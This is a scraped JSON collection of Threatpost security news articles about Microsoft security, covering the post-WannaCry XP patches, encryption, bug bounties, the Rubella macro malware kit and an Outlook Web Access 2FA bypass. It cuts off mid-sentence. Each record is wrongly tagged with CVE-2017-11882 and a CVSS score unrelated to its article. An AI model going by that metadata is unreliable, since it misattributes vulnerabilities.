[**![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054258/itunes_button392.jpg)**](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n", "cvss3": {}, "published": "2009-09-10T19:45:50", "type": "threatpost", "title": "Stephen Toulouse on the MSRC, the Evolution of Security at Microsoft and Securing Xbox Live", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:44", "id": "THREATPOST:EE14785AC189E016FD2CE51464D3643D", "href": "https://threatpost.com/stephen-toulouse-msrc-evolution-security-microsoft-and-securing-xbox-live-091009/73017/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:34", "description": "Fearing destructive attacks precipitated by the availability of the nation-state exploits in the wild that spawned the WannaCry outbreak, Microsoft today announced that its Patch Tuesday updates would include fixes for older versions of Windows, including XP.\n\nThe move is unusual and mimics a similar one made in the hours following WannaCry\u2019s appearance on May 12 when hundreds of thousands of Windows machines worldwide were compromised and their data encrypted.\n\nMicrosoft had pleaded with Windows admins to apply MS17-010, a security bulletin released in March, one month before the ShadowBrokers leaked a cadre of weaponized Windows exploits, but many did not take heed. Microsoft had to scramble as WannaCry made its way around the globe to release an [emergency update](<https://threatpost.com/microsoft-releases-xp-patch-for-wannacry-ransomware/125671/>) late in the evening of May 12 for Windows XP and Windows 8 machines, easing any potential pain for unsupported versions of Windows; EternalBlue, the NSA exploit in question, targeted SMB running on Windows XP and Windows 7 computers.\n\n\u201cDue to the elevated risk for destructive cyber attacks at this time, we made the decision to take this action because applying these updates provides further protection against potential attacks with characteristics similar to WannaCrypt,\u201d said Adrienne Hall, general manager of Microsoft\u2019s Cyber Defense Operations Center.\n\n\u201cIn reviewing the updates for this month, some vulnerabilities were identified that pose elevated risk of cyber attacks by government organizations, sometimes referred to as nation-state actors or other copycat organizations,\u201d Hall said. \u201cTo address this risk, today we are providing additional security updates along with our regular Update Tuesday service. These security updates are being made available to _all_ customers, including those using older versions of Windows.\u201d\n\nMicrosoft said that customers with automatic updates enabled are protected and would not have to take additional action to receive these updates. Microsoft said this is a rare decision and encouraged admins to apply the critical updates.\n\n\u201cOur decision today to release these security updates for platforms not in extended support should not be viewed as a departure from our standard servicing policies,\u201d said Eric Doerr, general manager of the Microsoft Security Response Center. \u201cBased on an assessment of the current threat landscape by our security engineers, we made the decision to make updates available more broadly.\u201d\n\nSince WannaCry, security experts have been warning Windows admins about the ferocity of the EternalBlue exploit and that it could be loaded with [any sort of payload](<https://threatpost.com/next-nsa-exploit-payload-could-be-much-worse-than-wannacry/125743/>), including wiper malware, banking Trojans, or more ransomware. Attackers have already on two occasions used it to spread cryptocurrency mining utilities.\n\nIt\u2019s unknown whether Microsoft was given any advance warning of another upcoming leak or if there are rumblings of another WannaCry-style attack. The ShadowBrokers promised monthly leaks of anything from Windows 10 exploits to mobile attacks to stolen nuclear and missile data in a new subscription service it promised to start next month.\n\nMicrosoft also maintained that organizations should long ago have moved away from older, unsupported platforms such as XP. Windows 10, for example, contains many new mitigations that prevent exploits such as EternalBlue from successfully compromising computers. Opponents of today\u2019s move\u2014and of the May 12 emergency update\u2014contend that these concessions on Microsoft\u2019s part to provide these types of updates will allow organizations to rationalize staying on unsupported versions of Windows.\n", "cvss3": {}, "published": "2017-06-13T15:34:53", "type": "threatpost", "title": "Risk of 'Destructive Cyber Attacks' Prompts Microsoft to Update XP Again", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-06-13T19:35:24", "id": "THREATPOST:F9FEB3F0862AAD4CC618F9737F44FA7B", "href": "https://threatpost.com/risk-of-destructive-cyber-attacks-prompts-microsoft-to-update-xp-again/126235/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:35", "description": "Microsoft is no exception when it comes to [large technology providers committing to encrypting](<http://threatpost.com/yahoo-encrypts-data-center-links-boosts-other-services/105228>) the services its users depend on.\n\nToday, the company [announced](<http://blogs.technet.com/b/microsoft_on_the_issues/archive/2014/06/30/advancing-our-encryption-and-transparency-efforts.aspx>) an update on the progress it has made in engineering those changes, including the news that Outlook.com, its web-based email service, supports TLS encryption inbound and outbound as well as Perfect Forward Secrecy.\n\n\u201cOur goal is to provide even greater protection for data across all the great Microsoft services you use and depend on every day,\u201d said Matt Thomlinson, vice president Trustworthy Computing. \u201cThis effort also helps us reinforce that governments use appropriate legal processes, not technical brute force, if they want access to that data.\u201d\n\nMicrosoft also announced that its OneDrive cloud-based storage service has enabled Perfect Forward Secrecy. The technology keeps data safe by randomizing private encryption keys used to secure communication; if a key is compromised, it cannot be used to decrypt other messages at a future time.\n\nIn the year-plus since the Snowden revelations began and [technology companies were questioned about the level of their complicity](<http://threatpost.com/tech-giants-update-transparency-reports-with-fisa-request-numbers/104056>) with government surveillance, firms such as Microsoft, Google, Facebook and Yahoo and have taken public stands about the security of their services.\n\nDevelopers are being encouraged to use encryption and security technologies such as HTTPS, HSTS and PFS as default starting points in new applications. In December, Microsoft said it would have encryption protecting its services by the end of this year, including supporting HSTS on its public-facing services that exchange data, including email and credentials. Microsoft said it would also roll out STARTTLS for Outlook.com.\n\nHSTS, or [HTTPS Strict Transport Protocol](<http://threatpost.com/ie-12-to-support-hsts-encryption-protocol/105266>), forces sessions sent over HTTP to be sent instead over HTTPS. [STARTTLS](<http://threatpost.com/smtp-starttls-deployments-better-than-expected-facebook-says/106054>), meanwhile, allows clients and servers to encrypt messages provided both ends of a conversation support the protocol.\n\nMicrosoft\u2019s December promise, meanwhile, is coming to fruition.\n\n[Microsoft\u2019s December promise](<http://blogs.technet.com/b/microsoft_blog/archive/2013/12/04/protecting-customer-data-from-government-snooping.aspx?Redirected=true>), meanwhile, is coming to fruition. It promised then to encrypt customer data moving between the user and Microsoft would be encrypted by default and data moving between data centers would too be encrypted. Microsoft has already moved to deprecate weak encryption keys, supporting only a minimum 2048-bit key lengths.\n\nMicrosoft chose email as a starting point to concentrate its encryption efforts, bringing in worldwide partners such as Deutsche Telekom, Yandex and Mail.ru to test the viability of its encryption. The additional of Perfect Forward Secrecy to Outlook and OneDrive, for example, puts up another barrier not only for government intelligence agencies, but for criminal hackers as well.\n\n\u201cForward secrecy uses a different encryption key for every connection, making it more difficult for attackers to decrypt connections,\u201d Thomlinson said, adding that OneDrive customers get PFS whether accessing the service online, though its mobile application or a sync client. \u201cAs with Outlook.com\u2019s email transfer, this makes it more difficult for attackers to decrypt connections between their systems and OneDrive.\u201d\n\nMicrosoft also announced it has opened its first Microsoft Transparency Center. Located on the Redmond campus, the center enables participating governments with a place to review source code for a number of products and certify the integrity of the source code. Other such centers are in the works Thomlinson said, including one in Brussels, Belgium, announced in January.\n\n\u201cAs with most things relating to security, the landscape is ever changing,\u201d he said. \u201cOur work is ongoing and we are continuing to advance on engineering and policy commitments with the goal of increasing protection for your data and increasing transparency in our processes.\u201d\n", "cvss3": {}, "published": "2014-07-01T14:42:05", "type": "threatpost", "title": "Microsoft Expands TLS, Forward Secrecy Support", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-07-01T18:42:05", "id": "THREATPOST:F514D796FE42C0629BD951D8664A2420", "href": "https://threatpost.com/microsoft-expands-tls-forward-secrecy-support/106965/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:36", "description": "Dennis Fisher talks with Ryan Naraine about the new Microsoft bug bounty program, how it may affect prices for vulnerabilities on the private market and why it took the company so long to start the reward program.\n\n<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07044809/digital_underground_116.mp3>![](https://threatpost.com/wp-includes/js/tinymce/plugins/wordpress/img/trans.gif)\n\nDownload: [digital_underground_116](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07044126/digital_underground_116.mp3>)[ \n](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07044809/digital_underground_116.mp3>)\n", "cvss3": {}, "published": "2013-06-21T09:49:19", "type": "threatpost", "title": "Ryan Naraine on Microsoft's New Bug Bounty Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-16T20:41:20", "id": "THREATPOST:D49075D6FFF077A542015B7F806F4E27", "href": "https://threatpost.com/ryan-naraine-on-microsofts-bug-bounty-program/101053/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:19", "description": "About a decade ago, many large software makers learned some very difficult lessons about software security and building security into their products from the start. Some are still learning. The FTC and a variety of security experts are hoping that today\u2019s crop of start-ups will not have to go through that same painful process.\n\nThe FTC is launching a new initiative aimed at start-ups, called [Start With Security](<https://www.ftc.gov/tips-advice/business-center/guidance/start-security-guide-business>), that\u2019s designed to help smaller companies build security into not just their products, but also into their cultures. One of the thrusts of that effort is encouraging companies to begin thinking about the security of their products from the very beginning of the design and development process. This is something that vendors such as Microsoft, Adobe, and many others have been doing for some time.\n\nBut that\u2019s not always because someone inside the company just thought it was a keen idea. In most cases, the changes the software makers made were in response to repeated public attacks on their products and pressure from customers for change. Microsoft is the perfect example. Following a series of major worms that exploited bugs in their products, the company did an about-face on security.\n\n[Window Snyder](<https://threatpost.com/how-i-got-here-window-snyder/114524/>), who was in the security group at Microsoft at the time, said during a panel at an [event](<https://www.ftc.gov/news-events/events-calendar/2015/09/start-security-san-francisco>) sponsored by the FTC in San Francisco Wednesday that the change was an incredibly difficult one for the company.\n\n\u201cThe real motivator for change at Microsoft was a tremendous amount of pain. You guys don\u2019t have to go that route,\u201d said Snyder, who is now the CSO at Fastly.\n\n\u201cThe cost to Microsoft to make those kinds of changes was tremendous. It was a huge challenge for them to try and turn the ship at that point. That was a huge cost and you don\u2019t want to do it at the end, you want to do it at the beginning. That\u2019s the time to think about security.\u201d\n\nNot only is the process simpler when you start thinking about security early, it\u2019s far less expensive, the panelists said.\n\n\u201cSecurity is much, much, much cheaper the earlier you do it,\u201d said Devdatta Akhawe, a security engineer at Dropbox. \u201cEither you can plan for security early on and be happy later, or keep fighting and have an expensive battle later on.\u201d\n\nThis is a message that software security experts and many others have been trying to convey to developers and design teams for a long time, with varying levels of success. Many large enterprises, not just commercial software vendors, have adopted secure coding and threat modeling practices and become involved in projects such as [BSIMM](<https://www.bsimm.com>), a software security maturity model.\n\nBut getting the security message across to non-security people can be a difficult process. Frank Kim, CISO of The SANS Institute, said making the risks and rewards real for people is an important aspect of the effort.\n\n\u201cYou have to focus on telling stories. You can\u2019t just go and say, There\u2019s a vulnerability in this line of code and you\u2019re a terrible person,\u201d Kim said. \u201cWe make it tangible and concrete by telling stories about what can happen to your application as a result of that vulnerability.\u201d\n\nThe seriousness of the security problem is not lost on officials at the top of the FTC, which is responsible for investigating and punishing companies that fail to live up to security and privacy standards.\n\n\u201cIn a world where everything is connected, insecure products and services can have severe consequences. It\u2019s never been more clear that we must secure the software supporting our digital lives,\u201d FTC Chairwoman Edith Ramirez said in her opening remarks at the event.\n", "cvss3": {}, "published": "2015-09-09T15:03:39", "type": "threatpost", "title": "FTC, Experts Push Startups to Think About Security From the Beginning", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-09-09T19:03:39", "id": "THREATPOST:A3218B82F449C5905D1957A1C264C1C1", "href": "https://threatpost.com/ftc-experts-push-startups-to-think-about-security-from-the-beginning/114612/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:14", "description": "![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053600/charney.jpg)\n\nScott Charney used his keynote speech at the RSA Conference on Tuesday to talk up a variety of hardware and software-based technologies meant to infuse the Internet with more trust. Charney, the head of Microsoft\u2019s Trustworthy Computing team, talked about the need for greater adoption of TPMs, code signing and identity systems, all of which the company has been discussing in various forms for the better part of a decade.\n\nMany of the technologies that Charney discussed, including the TPM and code signing, were part of the company\u2019s much-maligned and controversial Palladium project. Some of the technologies have been implemented in various forms in Vista and others are still forthcoming. But Charney said Tuesday that many of the problems that plague the Internet could be addressed with better trust on the part of users, machines, vendors and other parties.\n\n\u201cWe need alignment between political, economic and social forces and IT,\u201d he said. \u201cWe need trusted people, we need to know who we\u2019re dealing with online.\u201d\n\nMany of the machines that now run Vista include a TPM, which is a hardware module used to attest to the identity of the machine, as well as serve as a sealed storage area for cryptographic keys. \u201cWe have to root trust in the hardware because it\u2019s less malleable than software,\u201d Charney said.\n\nMicrosoft also is working on some new technologies, including the [Geneva server](<http://msdn.microsoft.com/en-us/security/aa570351.aspx>) which handles identity in a claims-based manner, Charney said. \u201cThis identity metasystem is the most controversial part because of privacy concerns,\u201d he said.\n", "cvss3": {}, "published": "2009-04-21T18:54:59", "type": "threatpost", "title": "Charney plugs Microsoft end-to-end trust at RSA Conference", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:23", "id": "THREATPOST:6C50260122AE142A1AA28DCFDE4EA98B", "href": "https://threatpost.com/charney-plugs-microsoft-end-end-trust-rsa-conference-042109/72565/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:49", "description": "[From Washington Post (Brian Krebs)](<http://voices.washingtonpost.com/securityfix/2009/07/msft_scrambling_to_close_stubb.html>)\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054049/windows_security1.jpg)](<https://threatpost.com/microsoft-scrambling-close-stubborn-security-hole-072409/>)Microsoft may soon be taking the unusual step of issuing an out-of-band security update to address multiple weaknesses that stem from a Windows security flaw that the software giant tried to fix earlier this month. [Read the full story](<http://voices.washingtonpost.com/securityfix/2009/07/msft_scrambling_to_close_stubb.html>) [washingtonpost.com] See more details [at Halvar Flake\u2019s blog](<http://addxorrol.blogspot.com/2009/07/poking-around-msvidctldll.html>) [blogspot.com]\n", "cvss3": {}, "published": "2009-07-24T14:02:10", "type": "threatpost", "title": "Microsoft Scrambling to Close Stubborn Security Hole", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:56", "id": "THREATPOST:5D03FA1B3C642C5317FB96AFA476DDFA", "href": "https://threatpost.com/microsoft-scrambling-close-stubborn-security-hole-072409/72881/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:10", "description": "![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053901/air_force_windows_xp_small.jpg)\n\nMicrosoft has developed an ultra-secure version of Windows XP, with many settings locked down by default. But the hardened OS isn\u2019t for sale to the general public; it\u2019s made specifically for the military. Microsoft built the secure version of XP a few years ago at the direction of the Air Force, which had grown weary of the constant updates to other Windows versions and had just seen its network defenses abused in a pentration test by the National Security Agency.\n\nIn response, the Air Force went to Microsoft and leaned on the software giant to put together a hardened version of XP, built to the service\u2019s specifications. As Wired.com\u2019s [Threat Level](<http://www.wired.com/threatlevel/2009/04/air-force-windows/>) reports:\n\nThe Air Force persuaded Microsoft CEO Steve Ballmer to provide it with a secure Windows configuration that saved the service about $100 million in contract costs and countless hours of maintenance. At a congressional hearing this week on cybersecurity, Alan Paller, research director of the Sans Institute, shared the story as an template for how the government could use its massive purchasing power to get companies to produce more secure products. And those could eventually be available to the rest of us.\n\nSecurity experts have been arguing for this \u201ctrickle-down\u201d model for years. But rather than wield its buying power for the greater good, the government has long wimped out and taken whatever vendors served them. If the Air Force case is a good judge, however, things might be changing.\n\nVarious government agencies have in fact tried this tactic before, with various levels of success. The [Department of Energy signed a contract with Oracle](<http://www.nytimes.com/2003/09/24/business/technology-briefing-software-oracle-and-energy-dept-increase-software-security.html?n=Top/News/Business/Companies/Oracle%20Corporation>) in 2003 that specified various minimum security settings in the company\u2019s products. Little has been heard of this effort since then, however.\n\nWhile this version was built to the Air Force\u2019s specifications, both home users and IT shops can benefit from the work by applying the [secure configuration settings for Windows XP](<http://csrc.nist.gov/itsec/guidance_WinXP.html>) published by the National Institute of Standards and Technology. The guidelines are step-by-step walkthroughs for locking down machines running XP, and there are similar guides for Windows Vista and other products on the NIST site.\n", "cvss3": {}, "published": "2009-05-01T14:37:52", "type": "threatpost", "title": "Microsoft develops secure Windows XP for military", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:05", "id": "THREATPOST:05CA5F0BEDE4AEE08ED1C40F6D413601", "href": "https://threatpost.com/microsoft-develops-secure-windows-xp-military-050109/72775/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:33", "description": "[![Blue Hat](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065910/bluehat_0.jpg)](<https://threatpost.com/vasillis-pappas-wins-200000-microsoft-blue-hat-prize-072712/>)LAS VEGAS\u2013Microsoft on Thursday handed out three rather large checks to a trio of security researchers, the largest one\u2013$200,000\u2013going to Vasillis Pappas who won the company\u2019s first [Blue Hat Prize](<https://threatpost.com/three-nations-and-three-different-perspectives-blue-hat-finalists-focus-defense-072612/>) competition for defensive technologies. Pappas\u2019s kBouncer ROP mitigation technology edged out ROP-related submissions from the two other finalists, and will be integrated by Microsoft in the near future.\n\nThe company announced Pappas as the winner of the contest at its annual party at the end of the Black Hat conference here with a splashy American Idol-style reveal, complete with blaring music and a massive confetti shower. Pappas, a PhD candidate at Columbia University, has been focused on the research for his submission for more than a year. His kBouncer technology uses the kernel to enforce restrictions about what processes can do, and prevents anything that looks like return-oriented programming from running.\n\nIn addition to the $200,000 that Pappas won, Ivan Fratric was awarded $50,000 for his ROPGuard technology and Jared DeMott won $10,000 and an MSDN subscription for his /ROP submission. Microsoft officials said they were quite happy with the quality of the submissions for the contest and accomplished their stated goal of identifying innovative defensive technologies.\n\n\u201cRunning the BlueHat Prize contest allowed us insight into a greater number of people who are doing some deep thinking in the areas of security mitigation technology. This not only helps Microsoft find and work with talented people, but the spotlight that we can help shine on all of these contestants will hopefully help them market their ideas and talent so that the entire security industry can benefit and improve,\u201d [Katie Moussouris of Microsoft](<https://blogs.technet.com/b/ecostrat/archive/2012/07/26/the-bluehat-prize-v1-0-and-the-winners-are.aspx?Redirected=true>) said in a blog post on the contest.\n\nMicrosoft officials have said repeatedly in the lest few years that the company does not plan to offer bug bounties to security researchers who discover vulnerabilities in Microsoft products. Google, Mozilla and several other companies have such programs, and the Blue Hat prize was Microsoft\u2019s way of responding and attempting to focus the energy of researchers on defensive technologies instead of finding bugs.\n\n\u201cOne thing is certain \u2013 we will continue to invest in security defense at Microsoft, and we will continue to offer cash incentives to the security community for helping Microsoft, and the rest of the industry, to help improve the state of security for the entire ecosystem. In sports, as in life, a great team understands both offense and defense. To address the security threats of today and tomorrow, we as an industry need to appreciate both,\u201d Moussouris said.\n\n \n\n", "cvss3": {}, "published": "2012-07-27T13:57:41", "type": "threatpost", "title": "Vasillis Pappas Wins $200,000 Microsoft Blue Hat Prize", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:47", "id": "THREATPOST:44C93D75841336281571380C5E523A23", "href": "https://threatpost.com/vasillis-pappas-wins-200000-microsoft-blue-hat-prize-072712/76857/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-04-25T05:50:07", "description": "A crimeware kit dubbed the Rubella Macro Builder is betting on a \u201cdirty deeds done dirt cheap\u201d approach to gain popularity in the criminal underground. The kit does two things: with a point-and-click builder functionality, it generates an initial malware payload for social-engineering spam campaigns; and it only costs $40 per month.\n\nRubella is not particularly high-achieving: It eschews the [exploitation of vulnerabilities](<https://threatpost.com/where-have-all-the-exploit-kits-gone/124241/>) for social-engineering techniques; users use it to take the well-worn route of sending out mail with Microsoft Word or Excel email attachments (with the goal of getting victims to enable malicious macros). It\u2019s not very aspirational either: Its humble intent involves generating fairly simple first-stage loader malware that threat actors can use for subsequent downloads and installations on targeted machines.\n\nHowever, the price is right, and it\u2019s got some attractive bells and whistles. A three-month license includes various encryption algorithm choices (XOR and Base64), download methods (PowerShell, Bitsadmin, Microsoft.XMLHTTP, MSXML2.XMLHTTP or a custom PowerShell payload), payload execution methods (executable, JavaScript, Visual Basic Script), and the ability to easily deploy social-engineering decoy themes.\n\n\u201cDespite being relatively new and unsophisticated, the kit has a clear appeal for cybercriminals: it\u2019s cheap, fast and can defeat basic static antivirus detection,\u201d said Flashpoint researchers, [in a blog](<https://www.flashpoint-intel.com/blog/rubella-macro-builder/>).\n\nCheap and easy: That phrase is music to criminals\u2019 ears everywhere, and no less so in the cyberworld. And indeed it\u2019s gaining traction: Flashpoint analysts determined that the criminal gangs behind the Panda and Gootkit banking malware each leveraged the Rubella first-stage loader as an initial attack vector in two recent but separate campaigns.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2018/04/26145144/Rubella-300x210.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/04/26145144/Rubella.png>)\n\n\u201cIt is likely that the gangs are customers of the actor offering Rubella on the underground,\u201d the researchers said. \u201cSpecifically, the gangs behind the Panda malware distribution appear to have targeted customers through various social-media platforms, as well as an Australian financial institution through Panda\u2019s web-inject functionality.\u201d\n\nThe macro junk and substitution method appears to be relatively primitive, relying on basic string substitutions. Additionally, its copy/paste implementation of the Base64 algorithm is displayed in Visual Basic Script (VBS) code implementation. The code is obfuscated through general Chr ASCII values. But it lives squarely in the sweet spot for most financially motivated criminals, whose model relies on maximizing margins and volume. And the infection tactics, though arguably pedestrian, work.\n\n\u201cMicrosoft Office macro-based malware appears to still be threat actors\u2019 preferred method for obtaining initial access to compromised machines,\u201d Flashpoint researchers said. \u201cSuch Microsoft Office-based loader malware works well as an initial decoy\u2014disguising itself as a commonly exchanged Word or Excel document and impersonating normal Microsoft Office or Excel attachments\u2014and is generally spread via email attacks. While relatively unsophisticated, the Rubella Macro Builder represents a moderate threat to various networks.\u201d\n", "cvss3": {}, "published": "2018-04-26T19:33:48", "type": "threatpost", "title": "Rubella Crimeware Kit: Cheap, Easy and Gaining Traction", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-04-26T19:33:48", "id": "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "href": "https://threatpost.com/rubella-crimeware-kit-cheap-easy-and-gaining-traction/131474/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:30", "description": "Enterprises running Exchange Server have been operating under a false sense of security with regard to two-factor authentication implementations on Outlook Web Access (OWA) adding an extra layer of protection.\n\nA design weakness has been exposed that can allow an attacker to easily bypass 2FA and access an organization\u2019s email inboxes, calendars, contacts and more.\n\nThe problem lies in the fact that Exchange Server also exposes the Exchange Web Services (EWS) interface alongside OWA and it is [not covered by two-factor authentication](<http://www.blackhillsinfosec.com/?p=5396>). EWS is enabled by default and shares the same port and server as OWA, meaning an attacker with [stolen] credentials can remotely access EWS, which talks to the same backend infrastructure as OWA, and would enable access a user\u2019s inbox.\n\nThe issue was publicly disclosed on Wednesday by researcher Beau Bullock of Black Hills Information Security, a consultancy based in South Dakota. Bullock privately disclosed his findings to Microsoft on Sept. 28, and after an initial acknowledgement, repeated follow-up emails failed to produce a patch or mitigation. Bullock went public yesterday, but shortly thereafter, Microsoft contacted him with a mitigation that would likely break some services that rely on Exchange Web Services, such as thick clients like Outlook for Mac.\n\nBullock told Threatpost that it\u2019s likely Microsoft cannot fix this without re-architecting some parts of the affected infrastructure.\n\n\u201cThe biggest thing is that Outlook Web Access is on the same webserver as Exchange Web Services and they\u2019re both enabled by default. I think the biggest problem is that most people don\u2019t seem to understand that\u2019s the thing that\u2019s happening,\u201d Bullock said. \u201cA lot of people think they have this Exchange server on the Internet and they have it there just for OWA, but the biggest problem is they don\u2019t understand EWS is enabled by default as well. The fix is more widespread awareness that it\u2019s actually there.\u201d\n\nBullock, a penetration tester, believes that there isn\u2019t a lot of awareness that this configuration exists and that organizations aren\u2019t aware that this second protocol is running alongside OWA and is not covered by 2FA.\n\n\u201cThat\u2019s not inherently clear in the documentation that if you enable two-factor authentication on OWA, you have to be careful that you have this other protocol right here that is still only single factor,\u201d Bullock said. \u201cIt talks to same backend infrastructure.\u201d\n\nBullock pointed out that it\u2019s not unusual to have different protocols, such as RDP and SMB, running on the same server where, for example, RDP is covered by two-factor authentication and SMB is not. The two services, however, are not running on the same port, and Bullock points out that an enterprise could create firewall rules to curtail access.\n\n\u201cThat\u2019s why this is more of a serious issue,\u201d Bullock explained. \u201cWhen you expose a server externally, you allow access only to that port. If you don\u2019t know a completely separate protocol is operating on same port, you\u2019re potentially opening up another way to communicate to that infrastructure.\u201d\n\nBullock described in a report published yesterday how he carried out the attack against OWA protected by Duo for Outlook 2FA. \nBy targeting EWS with his test account\u2019s credentials and a pen-testing tool called MailSniper, which connects to Exchange and searches an inbox for sensitive data, Bullock was able to bypass the 2FA protecting OWA. An attacker in a real-world scenario could gain access to a user\u2019s credentials, for example, from any of the tens of millions of credentials dumped online this summer.\n\nTo confirm that this wasn\u2019t an issue with Duo for Outlook, Bullock ran a similar test against Office 365 with Microsoft Azure Multifactor Authentication enabled. Using the same attack, he was able to bypass that 2FA as well, Bullock said.\n\n\u201cThis does not affect Office 365 with multi-factor authentication (MFA) fully enabled. What the blog describes is not a software vulnerability and does not work without user account credentials/stolen passwords,\u201d a Microsoft spokesperson told Threatpost.\n\n\u201cI think in the end, the best solution would be to re-architect it,\u201d Bullock said. \u201cIn the short term, how hard would it be for Microsoft to disable it by default and if an organization actually needed to use EWS for a thick client, then they could enable it. They\u2019re trying to keep all the protocols open and make it easier for deployment.\u201d\n", "cvss3": {}, "published": "2016-11-03T15:15:56", "type": "threatpost", "title": "Outlook Web Access Two-Factor Authentication Bypass Exists", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-11-03T19:15:56", "id": "THREATPOST:8FACBD9A4509F71E19E07BB451FD68A0", "href": "https://threatpost.com/outlook-web-access-two-factor-authentication-bypass-exists/121777/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:32", "description": "Microsoft gave its users steps earlier this week to sidestep a vulnerability in one of Oracle\u2019s Outside In libraries. The company published some mitigations for the bug, but said it isn\u2019t aware of any active attacks against it yet.\n\nThe Oracle technology is licensed by software developers like Microsoft to transform and control different types of file formats. Outside In is present in Microsoft\u2019s Exchange Server 2007, Exchange Server 2010 and FAST Search Server for Sharepoint products. The vulnerability was initially highlighted in [Oracle\u2019s Critical Patch Update Advisory for this month](<http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html>).\n\nIn a [post on its Technet blog](<https://blogs.technet.com/b/msrc/archive/2012/07/24/security-advisory-2737111-released.aspx?Redirected=true>), Dave Forstrom of the Trustworthy Computing claimed Microsoft isn\u2019t aware of any active exploits against the vulnerability but insisted following the workaround would be the best practice for users until an adequate security update was developed.\n\n[A separate blog post](<http://blogs.technet.com/b/srd/archive/2012/07/24/more-information-on-security-advisory-2737111.aspx>) by Microsoft\u2019s Security and Defense team explains the best way to minimize risk is disabling WebReady Document Viewing on the VDir of all CAS servers. This will circumvent a problem that lies in the way WebReady Document Viewing renders certain attachments as a web page \u201cinstead of relying on local applications to open/view it,\u201d according to the post.\n\nFor more on this, including a more in depth explanation of the Oracle flaw, head to [Technet](<https://blogs.technet.com/b/msrc/archive/2012/07/24/security-advisory-2737111-released.aspx?Redirected=true>).\n", "cvss3": {}, "published": "2012-07-26T16:34:25", "type": "threatpost", "title": "Microsoft Publishes Workaround for Oracle Outside In Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:47", "id": "THREATPOST:105BBC66E564BD98581E52653F5EA865", "href": "https://threatpost.com/microsoft-publishes-workaround-oracle-outside-vulnerability-072612/76854/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:23", "description": "Today is Patch Tuesday, the 11-year-old procession of security bulletins from Microsoft streamed out automatically to consumers of Windows Update, and pulled en masse by enterprise admins worldwide needing to test each for compatibility.\n\nThis is how it\u2019s been done since shortly after Bill Gates\u2019 Trustworthy Computing memo in 2002 set Microsoft on its course of secure software development. But in 2015, as the concept approaches adolescence, are we asking the right questions about the viability of a scheduled patch delivery?\n\nSure enterprises may be engrained in this rote consumption of security fixes on the second Tuesday of every month, but given that Microsoft 